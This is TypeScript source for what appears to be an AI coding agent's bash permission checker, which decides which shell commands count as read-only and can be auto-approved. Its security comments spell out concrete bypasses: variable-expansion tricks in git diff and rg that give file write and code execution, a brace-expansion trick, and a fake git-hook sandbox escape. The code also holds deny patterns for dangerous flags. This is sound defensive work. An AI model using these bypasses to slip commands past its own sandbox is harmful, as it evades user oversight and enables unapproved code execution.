'--examine': 'string',
'--url': 'string',
'--multi-turn': 'number',
'--multi-turn-model': 'string',
'--multi-turn-context': 'string',
'--no-rerank': 'none',
'--audit': 'none',
'--local': 'none',
'--staging': 'none',
},
},
}
function getCommandAllowlist(): Record<string, CommandConfig> {
let allowlist: Record<string, CommandConfig> = COMMAND_ALLOWLIST
// On Windows, xargs can be used as a data-to-code bridge: if a file contains
// a UNC path, `cat file | xargs cat` feeds that path to cat, triggering SMB
// resolution. Since the UNC path is in file contents (not the command string),
// regex-based detection cannot catch this.
if (getPlatform() === 'windows') {
const { xargs: _, ...rest } = allowlist
allowlist = rest
}
if (process.env.USER_TYPE === 'ant') {
return { ...allowlist, ...ANT_ONLY_COMMAND_ALLOWLIST }
}
return allowlist
}
/**
* Commands that are safe to use as xargs targets for auto-approval.
*
* SECURITY: Only add a command to this list if it has NO flags that can:
* 1. Write to files (e.g., find's -fprint, sed's -i)
* 2. Execute code (e.g., find's -exec, awk's system(), perl's -e)
* 3. Make network requests
*
* These commands must be purely read-only utilities. When xargs uses one of
* these as a target, we stop validating flags after the target command
* (see the `break` in isCommandSafeViaFlagParsing), so the command itself
* must not have ANY dangerous flags, not just a safe subset.
*
* Each command was verified by checking its man page for dangerous capabilities.
*/
const SAFE_TARGET_COMMANDS_FOR_XARGS = [
'echo', // Output only, no dangerous flags
'printf', // xargs runs /usr/bin/printf (binary), not bash builtin β no -v support
'wc', // Read-only counting, no dangerous flags
'grep', // Read-only search, no dangerous flags
'head', // Read-only, no dangerous flags
'tail', // Read-only (including -f follow), no dangerous flags
]
/**
* Unified command validation function that replaces individual validator functions.
* Uses declarative configuration from COMMAND_ALLOWLIST to validate commands and their flags.
* Handles combined flags, argument validation, and shell quoting bypass detection.
*/
export function isCommandSafeViaFlagParsing(command: string): boolean {
// Parse the command to get individual tokens using shell-quote for accuracy
// Handle glob operators by converting them to strings, they don't matter from the perspective
// of this function
const parseResult = tryParseShellCommand(command, env => `$${env}`)
if (!parseResult.success) return false
const parsed = parseResult.tokens.map(token => {
if (typeof token !== 'string') {
token = token as { op: 'glob'; pattern: string }
if (token.op === 'glob') {
return token.pattern
}
}
return token
})
// If there are operators (pipes, redirects, etc.), it's not a simple command.
// Breaking commands down into their constituent parts is handled upstream of
// this function, so we reject anything with operators here.
const hasOperators = parsed.some(token => typeof token !== 'string')
if (hasOperators) {
return false
}
// Now we know all tokens are strings
const tokens = parsed as string[]
if (tokens.length === 0) {
return false
}
// Find matching command configuration
let commandConfig: CommandConfig | undefined
let commandTokens: number = 0
// Check for multi-word commands first (e.g., "git diff", "git stash list")
const allowlist = getCommandAllowlist()
for (const [cmdPattern] of Object.entries(allowlist)) {
const cmdTokens = cmdPattern.split(' ')
if (tokens.length >= cmdTokens.length) {
let matches = true
for (let i = 0; i < cmdTokens.length; i++) {
if (tokens[i] !== cmdTokens[i]) {
matches = false
break
}
}
if (matches) {
commandConfig = allowlist[cmdPattern]
commandTokens = cmdTokens.length
break
}
}
}
if (!commandConfig) {
return false // Command not in allowlist
}
// Special handling for git ls-remote to reject URLs that could lead to data exfiltration
if (tokens[0] === 'git' && tokens[1] === 'ls-remote') {
// Check if any argument looks like a URL or remote specification
for (let i = 2; i < tokens.length; i++) {
const token = tokens[i]
if (token && !token.startsWith('-')) {
// Reject HTTP/HTTPS URLs
if (token.includes('://')) {
return false
}
// Reject SSH URLs like git@github.com:user/repo.git
if (token.includes('@') || token.includes(':')) {
return false
}
// Reject variable references
if (token.includes('$')) {
return false
}
}
}
}
// SECURITY: Reject ANY token containing `$` (variable expansion). The
// `env => \`$${env}\`` callback at line 825 preserves `$VAR` as LITERAL TEXT
// in tokens, but bash expands it at runtime (unset vars β empty string).
// This parser differential defeats BOTH validateFlags and callbacks:
//
// (1) `$VAR`-prefix defeats validateFlags `startsWith('-')` check:
// `git diff "$Z--output=/tmp/pwned"` β token `$Z--output=/tmp/pwned`
// (starts with `$`) falls through as positional at ~:1730. Bash runs
// `git diff --output=/tmp/pwned`. ARBITRARY FILE WRITE, zero perms.
//
// (2) `$VAR`-prefix β RCE via `rg --pre`:
// `rg . "$Z--pre=bash" FILE` β executes `bash FILE`. rg's config has
// no regex and no callback. SINGLE-STEP ARBITRARY CODE EXECUTION.
//
// (3) `$VAR`-infix defeats additionalCommandIsDangerousCallback regex:
// `ps ax"$Z"e` β token `ax$Ze`. The ps callback regex
// `/^[a-zA-Z]*e[a-zA-Z]*$/` fails on `$` β "not dangerous". Bash runs
// `ps axe` β env vars for all processes. A fix limited to `$`-PREFIXED
// tokens would NOT close this.
//
// We check ALL tokens after the command prefix. Any `$` means we cannot
// determine the runtime token value, so we cannot verify read-only safety.
// This check must run BEFORE validateFlags and BEFORE callbacks.
for (let i = commandTokens; i < tokens.length; i++) {
const token = tokens[i]
if (!token) continue
// Reject any token containing $ (variable expansion)
if (token.includes('$')) {
return false
}
// Reject tokens with BOTH `{` and `,` (brace expansion obfuscation).
// `git diff {@'{'0},--output=/tmp/pwned}` β shell-quote strips quotes
// β token `{@{0},--output=/tmp/pwned}` has `{` + `,` β brace expansion.
// This is defense-in-depth with validateBraceExpansion in bashSecurity.ts.
// We require BOTH `{` and `,` to avoid false positives on legitimate
// patterns: `stash@{0}` (git ref, has `{` no `,`), `{{.State}}` (Go
// template, no `,`), `prefix-{}-suffix` (xargs, no `,`). Sequence form
// `{1..5}` also needs checking (has `{` + `..`).
if (token.includes('{') && (token.includes(',') || token.includes('..'))) {
return false
}
}
// Validate flags starting after the command tokens
if (
!validateFlags(tokens, commandTokens, commandConfig, {
commandName: tokens[0],
rawCommand: command,
xargsTargetCommands:
tokens[0] === 'xargs' ? SAFE_TARGET_COMMANDS_FOR_XARGS : undefined,
})
) {
return false
}
if (commandConfig.regex && !commandConfig.regex.test(command)) {
return false
}
if (!commandConfig.regex && /`/.test(command)) {
return false
}
// Block newlines and carriage returns in grep/rg patterns as they can be used for injection
if (
!commandConfig.regex &&
(tokens[0] === 'rg' || tokens[0] === 'grep') &&
/[\n\r]/.test(command)
) {
return false
}
if (
commandConfig.additionalCommandIsDangerousCallback &&
commandConfig.additionalCommandIsDangerousCallback(
command,
tokens.slice(commandTokens),
)
) {
return false
}
return true
}
/**
* Creates a regex pattern that matches safe invocations of a command.
*
* The regex ensures commands are invoked safely by blocking:
* - Shell metacharacters that could lead to command injection or redirection
* - Command substitution via backticks or $()
* - Variable expansion that could contain malicious payloads
* - Environment variable assignment bypasses (command=value)
*
* @param command The command name (e.g., 'date', 'npm list', 'ip addr')
* @returns RegExp that matches safe invocations of the command
*/
function makeRegexForSafeCommand(command: string): RegExp {
// Create regex pattern: /^command(?:\s|$)[^<>()$`|{}&;\n\r]*$/
return new RegExp(`^${command}(?:\\s|$)[^<>()$\`|{}&;\\n\\r]*$`)
}
// Simple commands that are safe for execution (converted to regex patterns using makeRegexForSafeCommand)
// WARNING: If you are adding new commands here, be very careful to ensure
// they are truly safe. This includes ensuring:
// 1. That they don't have any flags that allow file writing or command execution
// 2. Use makeRegexForSafeCommand() to ensure proper regex pattern creation
const READONLY_COMMANDS = [
// Cross-platform commands from shared validation
...EXTERNAL_READONLY_COMMANDS,
// Unix/bash-specific read-only commands (not shared because they don't exist in PowerShell)
// Time and date
'cal',
'uptime',
// File content viewing (relative paths handled separately)
'cat',
'head',
'tail',
'wc',
'stat',
'strings',
'hexdump',
'od',
'nl',
// System info
'id',
'uname',
'free',
'df',
'du',
'locale',
'groups',
'nproc',
// Path information
'basename',
'dirname',
'realpath',
// Text processing
'cut',
'paste',
'tr',
'column',
'tac', // Reverse cat β displays file contents in reverse line order
'rev', // Reverse characters in each line
'fold', // Wrap lines to specified width
'expand', // Convert tabs to spaces
'unexpand', // Convert spaces to tabs
'fmt', // Simple text formatter β output to stdout only
'comm', // Compare sorted files line by line
'cmp', // Byte-by-byte file comparison
'numfmt', // Number format conversion
// Path information (additional)
'readlink', // Resolve symlinks β displays target of symbolic link
// File comparison
'diff',
// true and false, used to silence or create errors
'true',
'false',
// Misc. safe commands
'sleep',
'which',
'type',
'expr', // Evaluate expressions (arithmetic, string matching)
'test', // Conditional evaluation (file checks, comparisons)
'getconf', // Get system configuration values
'seq', // Generate number sequences
'tsort', // Topological sort
'pr', // Paginate files for printing
]
// Complex commands that require custom regex patterns
// Warning: If possible, avoid adding new regexes here and prefer using COMMAND_ALLOWLIST
// instead. This allowlist-based approach to CLI flags is more secure and avoids
// vulns coming from gnu getopt_long.
const READONLY_COMMAND_REGEXES = new Set([
// Convert simple commands to regex patterns using makeRegexForSafeCommand
...READONLY_COMMANDS.map(makeRegexForSafeCommand),
// Echo that doesn't execute commands or use variables
// Allow newlines in single quotes (safe) but not in double quotes (could be dangerous with variable expansion)
// Also allow optional 2>&1 stderr redirection at the end
/^echo(?:\s+(?:'[^']*'|"[^"$<>\n\r]*"|[^|;&`$(){}><#\\!"'\s]+))*(?:\s+2>&1)?\s*$/,
// Claude CLI help
/^claude -h$/,
/^claude --help$/,
// Git readonly commands are now handled via COMMAND_ALLOWLIST with explicit flag validation
// (git status, git blame, git ls-files, git config --get, git remote, git tag, git branch)
/^uniq(?:\s+(?:-[a-zA-Z]+|--[a-zA-Z-]+(?:=\S+)?|-[fsw]\s+\d+))*(?:\s|$)\s*$/, // Only allow flags, no input/output files
// System info
/^pwd$/,
/^whoami$/,
// env and printenv removed - could expose sensitive environment variables
// Development tools version checking - exact match only, no suffix allowed.
// SECURITY: `node -v --run <task>` would execute package.json scripts because
// Node processes --run before -v. Python/python3 --version are also anchored
// for defense-in-depth. These were previously in EXTERNAL_READONLY_COMMANDS which
// flows through makeRegexForSafeCommand and permits arbitrary suffixes.
/^node -v$/,
/^node --version$/,
/^python --version$/,
/^python3 --version$/,
// Misc. safe commands
// tree command moved to COMMAND_ALLOWLIST for proper flag validation (blocks -o/--output)
/^history(?:\s+\d+)?\s*$/, // Only allow bare history or history with numeric argument - prevents file writing
/^alias$/,
/^arch(?:\s+(?:--help|-h))?\s*$/, // Only allow arch with help flags or no arguments
// Network commands - only allow exact commands with no arguments to prevent network manipulation
/^ip addr$/, // Only allow "ip addr" with no additional arguments
/^ifconfig(?:\s+[a-zA-Z][a-zA-Z0-9_-]*)?\s*$/, // Allow ifconfig with interface name only (must start with letter)
// JSON processing with jq - allow with inline filters and file arguments
// File arguments are validated separately by pathValidation.ts
// Allow pipes and complex expressions within quotes but prevent dangerous flags
// Block command substitution - backticks are dangerous even in single quotes for jq
// Block -f/--from-file, --rawfile, --slurpfile (read files into jq), --run-tests, -L/--library-path (load executable modules)
// Block 'env' builtin and '$ENV' object which can access environment variables (defense in depth)
/^jq(?!\s+.*(?:-f\b|--from-file|--rawfile|--slurpfile|--run-tests|-L\b|--library-path|\benv\b|\$ENV\b))(?:\s+(?:-[a-zA-Z]+|--[a-zA-Z-]+(?:=\S+)?))*(?:\s+'[^'`]*'|\s+"[^"`]*"|\s+[^-\s'"][^\s]*)+\s*$/,
// Path commands (path validation ensures they're allowed)
// cd command - allows changing to directories
/^cd(?:\s+(?:'[^']*'|"[^"]*"|[^\s;|&`$(){}><#\\]+))?$/,
// ls command - allows listing directories
/^ls(?:\s+[^<>()$`|{}&;\n\r]*)?$/,
// find command - blocks dangerous flags
// Allow escaped parentheses \( and \) for grouping, but block unescaped ones
// NOTE: \\[()] must come BEFORE the character class to ensure \( is matched as an escaped paren,
// not as backslash + paren (which would fail since paren is excluded from the character class)
/^find(?:\s+(?:\\[()]|(?!-delete\b|-exec\b|-execdir\b|-ok\b|-okdir\b|-fprint0?\b|-fls\b|-fprintf\b)[^<>()$`|{}&;\n\r\s]|\s)+)?$/,
])
/**
* Checks if a command contains glob characters (?, *, [, ]) or expandable `$`
* variables OUTSIDE the quote contexts where bash would treat them as literal.
* These could expand to bypass our regex-based security checks.
*
* Glob examples:
* - `python *` could expand to `python --help` if a file named `--help` exists
* - `find ./ -?xec` could expand to `find ./ -exec` if such a file exists
* Globs are literal inside BOTH single and double quotes.
*
* Variable expansion examples:
* - `uniq --skip-chars=0$_` β `$_` expands to last arg of previous command;
* with IFS word splitting, this smuggles positional args past "flags-only"
* regexes. `echo " /etc/passwd /tmp/x"; uniq --skip-chars=0$_` β FILE WRITE.
* - `cd "$HOME"` β double-quoted `$HOME` expands at runtime.
* Variables are literal ONLY inside single quotes; they expand inside double
* quotes and unquoted.
*
* The `$` check guards the READONLY_COMMAND_REGEXES fallback path. The `$`
* token check in isCommandSafeViaFlagParsing only covers COMMAND_ALLOWLIST
* commands; hand-written regexes like uniq's `\S+` and cd's `"[^"]*"` allow `$`.
* Matches `$` followed by `[A-Za-z_@*#?!$0-9-]` covering `$VAR`, `$_`, `$@`,
* `$*`, `$#`, `$?`, `$!`, `$$`, `$-`, `$0`-`$9`. Does NOT match `${` or `$(` β
* those are caught by COMMAND_SUBSTITUTION_PATTERNS in bashSecurity.ts.
*
* @param command The command string to check
* @returns true if the command contains unquoted glob or expandable `$`
*/
function containsUnquotedExpansion(command: string): boolean {
// Track quote state to avoid false positives for patterns inside quoted strings
let inSingleQuote = false
let inDoubleQuote = false
let escaped = false
for (let i = 0; i < command.length; i++) {
const currentChar = command[i]
// Handle escape sequences
if (escaped) {
escaped = false
continue
}
// SECURITY: Only treat backslash as escape OUTSIDE single quotes. In bash,
// `\` inside `'...'` is LITERAL β it does not escape the next character.
// Without this guard, `'\'` desyncs the quote tracker: the `\` sets
// escaped=true, then the closing `'` is consumed by the escaped-skip
// instead of toggling inSingleQuote. Parser stays in single-quote
// mode for the rest of the command, missing ALL subsequent expansions.
// Example: `ls '\' *` β bash sees glob `*`, but desynced parser thinks
// `*` is inside quotes β returns false (glob NOT detected).
// Defense-in-depth: hasShellQuoteSingleQuoteBug catches `'\'` patterns
// before this function is reached, but we fix the tracker anyway for
// consistency with the correct implementations in bashSecurity.ts.
if (currentChar === '\\' && !inSingleQuote) {
escaped = true
continue
}
// Update quote state
if (currentChar === "'" && !inDoubleQuote) {
inSingleQuote = !inSingleQuote
continue
}
if (currentChar === '"' && !inSingleQuote) {
inDoubleQuote = !inDoubleQuote
continue
}
// Inside single quotes: everything is literal. Skip.
if (inSingleQuote) {
continue
}
// Check `$` followed by variable-name or special-parameter character.
// `$` expands inside double quotes AND unquoted (only SQ makes it literal).
if (currentChar === '$') {
const next = command[i + 1]
if (next && /[A-Za-z_@*#?!$0-9-]/.test(next)) {
return true
}
}
// Globs are literal inside double quotes too. Only check unquoted.
if (inDoubleQuote) {
continue
}
// Check for glob characters outside all quotes.
// These could expand to anything, including dangerous flags.
if (currentChar && /[?*[\]]/.test(currentChar)) {
return true
}
}
return false
}
/**
* Checks if a single command string is read-only based on READONLY_COMMAND_REGEXES.
* Internal helper function that validates individual commands.
*
* @param command The command string to check
* @returns true if the command is read-only
*/
function isCommandReadOnly(command: string): boolean {
// Handle common stderr-to-stdout redirection pattern
// This handles both "command 2>&1" at the end of a full command
// and "command 2>&1" as part of a pipeline component
let testCommand = command.trim()
if (testCommand.endsWith(' 2>&1')) {
// Remove the stderr redirection for pattern matching
testCommand = testCommand.slice(0, -5).trim()
}
// Check for Windows UNC paths that could be vulnerable to WebDAV attacks
// Do this early to prevent any command with UNC paths from being marked as read-only
if (containsVulnerableUncPath(testCommand)) {
return false
}
// Check for unquoted glob characters and expandable `$` variables that could
// bypass our regex-based security checks. We can't know what these expand to
// at runtime, so we can't verify the command is read-only.
//
// Globs: `python *` could expand to `python --help` if such a file exists.
//
// Variables: `uniq --skip-chars=0$_` β bash expands `$_` at runtime to the
// last arg of the previous command. With IFS word splitting, this smuggles
// positional args past "flags-only" regexes like uniq's `\S+`. The `$` token
// check inside isCommandSafeViaFlagParsing only covers COMMAND_ALLOWLIST
// commands; hand-written regexes in READONLY_COMMAND_REGEXES (uniq, jq, cd)
// have no such guard. See containsUnquotedExpansion for full analysis.
if (containsUnquotedExpansion(testCommand)) {
return false
}
// Tools like git allow `--upload-pack=cmd` to be abbreviated as `--up=cmd`
// Regex filters can be bypassed, so we use strict allowlist validation instead.
// This requires defining a set of known safe flags. Claude can help with this,
// but please look over it to ensure it didn't add any flags that allow file writes
// code execution, or network requests.
if (isCommandSafeViaFlagParsing(testCommand)) {
return true
}
for (const regex of READONLY_COMMAND_REGEXES) {
if (regex.test(testCommand)) {
// Prevent git commands with -c flag to avoid config options that can lead to code execution
// The -c flag allows setting arbitrary git config values inline, including dangerous ones like
// core.fsmonitor, diff.external, core.gitProxy, etc. that can execute arbitrary commands
// Check for -c preceded by whitespace and followed by whitespace or equals
// Using regex to catch spaces, tabs, and other whitespace (not part of other flags like --cached)
if (testCommand.includes('git') && /\s-c[\s=]/.test(testCommand)) {
return false
}
// Prevent git commands with --exec-path flag to avoid path manipulation that can lead to code execution
// The --exec-path flag allows overriding the directory where git looks for executables
if (
testCommand.includes('git') &&
/\s--exec-path[\s=]/.test(testCommand)
) {
return false
}
// Prevent git commands with --config-env flag to avoid config injection via environment variables
// The --config-env flag allows setting git config values from environment variables, which can be
// just as dangerous as -c flag (e.g., core.fsmonitor, diff.external, core.gitProxy)
if (
testCommand.includes('git') &&
/\s--config-env[\s=]/.test(testCommand)
) {
return false
}
return true
}
}
return false
}
/**
* Checks if a compound command contains any git command.
*
* @param command The full command string to check
* @returns true if any subcommand is a git command
*/
function commandHasAnyGit(command: string): boolean {
return splitCommand_DEPRECATED(command).some(subcmd =>
isNormalizedGitCommand(subcmd.trim()),
)
}
/**
* Git-internal path patterns that can be exploited for sandbox escape.
* If a command creates these files and then runs git, the git command
* could execute malicious hooks from the created files.
*/
const GIT_INTERNAL_PATTERNS = [
/^HEAD$/,
/^objects(?:\/|$)/,
/^refs(?:\/|$)/,
/^hooks(?:\/|$)/,
]
/**
* Checks if a path is a git-internal path (HEAD, objects/, refs/, hooks/).
*/
function isGitInternalPath(path: string): boolean {
// Normalize path by removing leading ./ or /
const normalized = path.replace(/^\.?\//, '')
return GIT_INTERNAL_PATTERNS.some(pattern => pattern.test(normalized))
}
// Commands that only delete or modify in-place (don't create new files at new paths)
const NON_CREATING_WRITE_COMMANDS = new Set(['rm', 'rmdir', 'sed'])
/**
* Extracts write paths from a subcommand using PATH_EXTRACTORS.
* Only returns paths for commands that can create new files/directories
* (write/create operations excluding deletion and in-place modification).
*/
function extractWritePathsFromSubcommand(subcommand: string): string[] {
const parseResult = tryParseShellCommand(subcommand, env => `$${env}`)
if (!parseResult.success) return []
const tokens = parseResult.tokens.filter(
(t): t is string => typeof t === 'string',
)
if (tokens.length === 0) return []
const baseCmd = tokens[0]
if (!baseCmd) return []
// Only consider commands that can create files at target paths
if (!(baseCmd in COMMAND_OPERATION_TYPE)) {
return []
}
const opType = COMMAND_OPERATION_TYPE[baseCmd as PathCommand]
if (
(opType !== 'write' && opType !== 'create') ||
NON_CREATING_WRITE_COMMANDS.has(baseCmd)
) {
return []
}
const extractor = PATH_EXTRACTORS[baseCmd as PathCommand]
if (!extractor) return []
return extractor(tokens.slice(1))
}
/**
* Checks if a compound command writes to any git-internal paths.
* This is used to detect potential sandbox escape attacks where a command
* creates git-internal files (HEAD, objects/, refs/, hooks/) and then runs git.
*
* SECURITY: A compound command could bypass the bare repo detection by:
* 1. Creating bare git repo files (HEAD, objects/, refs/, hooks/) in the same command
* 2. Then running git, which would execute malicious hooks
*
* Example attack:
* mkdir -p objects refs hooks && echo '#!/bin/bash\nmalicious' > hooks/pre-commit && touch HEAD && git status
*
* @param command The full command string to check
* @returns true if any subcommand writes to git-internal paths
*/
function commandWritesToGitInternalPaths(command: string): boolean {
const subcommands = splitCommand_DEPRECATED(command)
for (const subcmd of subcommands) {
const trimmed = subcmd.trim()
// Check write paths from path-based commands (mkdir, touch, cp, mv)
const writePaths = extractWritePathsFromSubcommand(trimmed)
for (const path of writePaths) {
if (isGitInternalPath(path)) {
return true
}
}
// Check output redirections (e.g., echo x > hooks/pre-commit)
const { redirections } = extractOutputRedirections(trimmed)
for (const { target } of redirections) {
if (isGitInternalPath(target)) {
return true
}
}
}
return false
}
/**
* Checks read-only constraints for bash commands.
* This is the single exported function that validates whether a command is read-only.
* It handles compound commands, sandbox mode, and safety checks.
*
* @param input The bash command input to validate
* @param compoundCommandHasCd Pre-computed flag indicating if any cd command exists in the compound command.
* This is computed by commandHasAnyCd() and passed in to avoid duplicate computation.
* @returns PermissionResult indicating whether the command is read-only
*/
export function checkReadOnlyConstraints(
input: z.infer<typeof BashTool.inputSchema>,
compoundCommandHasCd: boolean,
): PermissionResult {
const { command } = input
// Detect if the command is not parseable and return early
const result = tryParseShellCommand(command, env => `$${env}`)
if (!result.success) {
return {
behavior: 'passthrough',
message: 'Command cannot be parsed, requires further permission checks',
}
}
// Check the original command for safety before splitting
// This is important because splitCommand_DEPRECATED may transform the command
// (e.g., ${VAR} becomes $VAR)
if (bashCommandIsSafe_DEPRECATED(command).behavior !== 'passthrough') {
return {
behavior: 'passthrough',
message: 'Command is not read-only, requires further permission checks',
}
}
// Check for Windows UNC paths in the original command before transformation
// This must be done before splitCommand_DEPRECATED because splitCommand_DEPRECATED may transform backslashes
if (containsVulnerableUncPath(command)) {
return {
behavior: 'ask',
message:
'Command contains Windows UNC path that could be vulnerable to WebDAV attacks',
}
}
// Check once if any subcommand is a git command (used for multiple security checks below)
const hasGitCommand = commandHasAnyGit(command)
// SECURITY: Block compound commands that have both cd AND git
// This prevents sandbox escape via: cd /malicious/dir && git status
// where the malicious directory contains fake git hooks that execute arbitrary code.
if (compoundCommandHasCd && hasGitCommand) {
return {
behavior: 'passthrough',
message:
'Compound commands with cd and git require permission checks for enhanced security',
}
}
// SECURITY: Block git commands if the current directory looks like a bare/exploited git repo
// This prevents sandbox escape when an attacker has:
// 1. Deleted .git/HEAD to invalidate the normal git directory
// 2. Created hooks/pre-commit or other git-internal files in the current directory
// Git would then treat the cwd as the git directory and execute malicious hooks.
if (hasGitCommand && isCurrentDirectoryBareGitRepo()) {
return {
behavior: 'passthrough',
message:
'Git commands in directories with bare repository structure require permission checks for enhanced security',
}
}
// SECURITY: Block compound commands that write to git-internal paths AND run git
// This prevents sandbox escape where a command creates git-internal files
// (HEAD, objects/, refs/, hooks/) and then runs git, which would execute
// malicious hooks from the newly created files.
// Example attack: mkdir -p hooks && echo 'malicious' > hooks/pre-commit && git status
if (hasGitCommand && commandWritesToGitInternalPaths(command)) {
return {
behavior: 'passthrough',
message:
'Compound commands that create git internal files and run git require permission checks for enhanced security',
}
}
// SECURITY: Only auto-allow git commands as read-only if we're in the original cwd
// (which is protected by sandbox denyWrite) or if sandbox is disabled (attack is moot).
// Race condition: a sandboxed command can create bare repo files in a subdirectory,
// and a backgrounded git command (e.g. sleep 10 && git status) would pass the
// isCurrentDirectoryBareGitRepo() check at evaluation time before the files exist.
if (
hasGitCommand &&
SandboxManager.isSandboxingEnabled() &&
getCwd() !== getOriginalCwd()
) {
return {
behavior: 'passthrough',
message:
'Git commands outside the original working directory require permission checks when sandbox is enabled',
}
}
// Check if all subcommands are read-only
const allSubcommandsReadOnly = splitCommand_DEPRECATED(command).every(
subcmd => {
if (bashCommandIsSafe_DEPRECATED(subcmd).behavior !== 'passthrough') {
return false
}
return isCommandReadOnly(subcmd)
},
)
if (allSubcommandsReadOnly) {
return {
behavior: 'allow',
updatedInput: input,
}
}
// If not read-only, return passthrough to let other permission checks handle it
return {
behavior: 'passthrough',
message: 'Command is not read-only, requires further permission checks',
}
}